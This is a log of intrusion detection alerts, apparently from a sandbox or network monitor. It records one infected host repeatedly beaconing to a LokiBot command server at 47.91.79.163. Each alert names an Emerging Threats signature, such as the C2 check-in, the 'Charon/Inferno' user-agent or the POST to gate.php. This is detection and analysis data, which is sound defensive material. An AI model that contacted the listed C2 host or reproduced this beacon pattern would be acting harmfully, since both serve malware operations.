                                    12/03/20-10:03:09.318355TCP2025483ET TROJAN LokiBot Fake 404 Response804983847.91.79.163192.168.2.3
                                    12/03/20-10:03:09.551736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.551736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.551736TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.551736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.551736TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.610619TCP2025483ET TROJAN LokiBot Fake 404 Response804983947.91.79.163192.168.2.3
                                    12/03/20-10:03:09.837842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.837842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.837842TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.837842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.837842TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.896492TCP2025483ET TROJAN LokiBot Fake 404 Response804984147.91.79.163192.168.2.3
                                    12/03/20-10:03:10.292766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.292766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.292766TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.292766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.292766TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.357725TCP2025483ET TROJAN LokiBot Fake 404 Response804984247.91.79.163192.168.2.3
                                    12/03/20-10:03:10.678499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.678499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.678499TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.678499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.678499TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.771741TCP2025483ET TROJAN LokiBot Fake 404 Response804984447.91.79.163192.168.2.3
                                    12/03/20-10:03:11.071451TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.071451TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.071451TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.071451TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.071451TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.214334TCP2025483ET TROJAN LokiBot Fake 404 Response804984547.91.79.163192.168.2.3
                                    12/03/20-10:03:11.553112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.553112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.553112TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.553112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.553112TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.615847TCP2025483ET TROJAN LokiBot Fake 404 Response804984647.91.79.163192.168.2.3
                                    12/03/20-10:03:11.821232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.821232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.821232TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.821232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.821232TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.875974TCP2025483ET TROJAN LokiBot Fake 404 Response804984847.91.79.163192.168.2.3
                                    12/03/20-10:03:12.190368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.190368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.190368TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.190368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.190368TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.249257TCP2025483ET TROJAN LokiBot Fake 404 Response804985047.91.79.163192.168.2.3
                                    12/03/20-10:03:12.493744TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.493744TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.493744TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.493744TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.493744TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.555351TCP2025483ET TROJAN LokiBot Fake 404 Response804985147.91.79.163192.168.2.3
                                    12/03/20-10:03:12.862106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.862106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.862106TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.862106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.862106TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.924524TCP2025483ET TROJAN LokiBot Fake 404 Response804985247.91.79.163192.168.2.3
                                    12/03/20-10:03:13.235860TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.235860TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.235860TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.235860TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.235860TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.303885TCP2025483ET TROJAN LokiBot Fake 404 Response804985347.91.79.163192.168.2.3
                                    12/03/20-10:03:13.990149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.347.91.79.163
                                    12/03/20-10:03:13.990149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.347.91.79.163
                                    12/03/20-10:03:13.990149TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.347.91.79.163
                                    12/03/20-10:03:13.990149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.2.347.91.79.163
                                    12/03/20-10:03:13.990149TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985480192.168.2.347.91.79.163
                                    12/03/20-10:03:14.050435TCP2025483ET TROJAN LokiBot Fake 404 Response804985447.91.79.163192.168.2.3
                                    12/03/20-10:03:15.823745TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.823745TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.823745TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.823745TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.823745TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.885562TCP2025483ET TROJAN LokiBot Fake 404 Response804985547.91.79.163192.168.2.3
                                    12/03/20-10:03:16.269414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.269414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.269414TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.269414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.269414TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.327590TCP2025483ET TROJAN LokiBot Fake 404 Response804985647.91.79.163192.168.2.3
                                    12/03/20-10:03:16.708489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.708489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.708489TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.708489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.708489TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.789518TCP2025483ET TROJAN LokiBot Fake 404 Response804985747.91.79.163192.168.2.3
                                    12/03/20-10:03:17.123306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.123306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.123306TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.123306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.123306TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.185949TCP2025483ET TROJAN LokiBot Fake 404 Response804985847.91.79.163192.168.2.3
                                    12/03/20-10:03:17.598132TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.598132TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.598132TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.598132TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.598132TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.878546TCP2025483ET TROJAN LokiBot Fake 404 Response804985947.91.79.163192.168.2.3
                                    12/03/20-10:03:18.277933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.277933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.277933TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.277933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.277933TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.340693TCP2025483ET TROJAN LokiBot Fake 404 Response804986047.91.79.163192.168.2.3
                                    12/03/20-10:03:19.025662TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.025662TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.025662TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.025662TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.025662TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.166356TCP2025483ET TROJAN LokiBot Fake 404 Response804986147.91.79.163192.168.2.3
                                    12/03/20-10:03:19.368860TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.368860TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.368860TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.368860TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.368860TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.428898TCP2025483ET TROJAN LokiBot Fake 404 Response804986247.91.79.163192.168.2.3
                                    12/03/20-10:03:19.879013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.879013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.879013TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.879013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.879013TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.953105TCP2025483ET TROJAN LokiBot Fake 404 Response804986447.91.79.163192.168.2.3
                                    12/03/20-10:03:20.167098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.167098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.167098TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.167098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.167098TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.230773TCP2025483ET TROJAN LokiBot Fake 404 Response804986547.91.79.163192.168.2.3
                                    12/03/20-10:03:20.635796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.635796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.635796TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.635796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.635796TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.702595TCP2025483ET TROJAN LokiBot Fake 404 Response804986647.91.79.163192.168.2.3
                                    12/03/20-10:03:20.914107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.914107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.914107TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.914107TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.914107TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.975845TCP2025483ET TROJAN LokiBot Fake 404 Response804986747.91.79.163192.168.2.3
                                    12/03/20-10:03:21.409025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.409025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.409025TCP2025381ET TROJAN LokiBot Checkin4986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.409025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.409025TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.474463TCP2025483ET TROJAN LokiBot Fake 404 Response804986847.91.79.163192.168.2.3
                                    12/03/20-10:03:21.989441TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.347.91.79.163
                                    12/03/20-10:03:21.989441TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.347.91.79.163
                                    12/03/20-10:03:21.989441TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.347.91.79.163
                                    12/03/20-10:03:21.989441TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.2.347.91.79.163
                                    12/03/20-10:03:21.989441TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986980192.168.2.347.91.79.163
                                    12/03/20-10:03:22.047095TCP2025483ET TROJAN LokiBot Fake 404 Response804986947.91.79.163192.168.2.3
                                    12/03/20-10:03:22.262478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.262478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.262478TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.262478TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.262478TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.321959TCP2025483ET TROJAN LokiBot Fake 404 Response804987047.91.79.163192.168.2.3
                                    12/03/20-10:03:22.758574TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.758574TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.758574TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.758574TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.758574TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.823090TCP2025483ET TROJAN LokiBot Fake 404 Response804987147.91.79.163192.168.2.3
                                    12/03/20-10:03:23.023042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.023042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.023042TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.023042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.023042TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.081216TCP2025483ET TROJAN LokiBot Fake 404 Response804987247.91.79.163192.168.2.3
                                    12/03/20-10:03:23.528398TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.528398TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.528398TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.528398TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.528398TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.585989TCP2025483ET TROJAN LokiBot Fake 404 Response804987347.91.79.163192.168.2.3
                                    12/03/20-10:03:24.023586TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.023586TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.023586TCP2025381ET TROJAN LokiBot Checkin4987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.023586TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.023586TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.206701TCP2025483ET TROJAN LokiBot Fake 404 Response804987447.91.79.163192.168.2.3
                                    12/03/20-10:03:24.680367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.680367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.680367TCP2025381ET TROJAN LokiBot Checkin4988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.680367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.680367TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.744697TCP2025483ET TROJAN LokiBot Fake 404 Response804988047.91.79.163192.168.2.3
                                    12/03/20-10:03:25.184133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.184133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.184133TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.184133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.184133TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.245221TCP2025483ET TROJAN LokiBot Fake 404 Response804988147.91.79.163192.168.2.3
                                    12/03/20-10:03:25.660223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.660223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.660223TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.660223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.660223TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.718343TCP2025483ET TROJAN LokiBot Fake 404 Response804988247.91.79.163192.168.2.3
                                    12/03/20-10:03:26.190091TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.190091TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.190091TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.190091TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.190091TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.256451TCP2025483ET TROJAN LokiBot Fake 404 Response804988347.91.79.163192.168.2.3
                                    12/03/20-10:03:26.801024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.801024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.801024TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.801024TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.801024TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.861568TCP2025483ET TROJAN LokiBot Fake 404 Response804988447.91.79.163192.168.2.3
                                    12/03/20-10:03:27.069096TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.069096TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.069096TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.069096TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.069096TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.127992TCP2025483ET TROJAN LokiBot Fake 404 Response804988547.91.79.163192.168.2.3
                                    12/03/20-10:03:27.591079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.591079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.591079TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.591079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.591079TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.649520TCP2025483ET TROJAN LokiBot Fake 404 Response804988647.91.79.163192.168.2.3
                                    12/03/20-10:03:28.103034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.103034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.103034TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.103034TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.103034TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.169105TCP2025483ET TROJAN LokiBot Fake 404 Response804988747.91.79.163192.168.2.3
                                    12/03/20-10:03:28.370667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.370667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.347.91.79.163
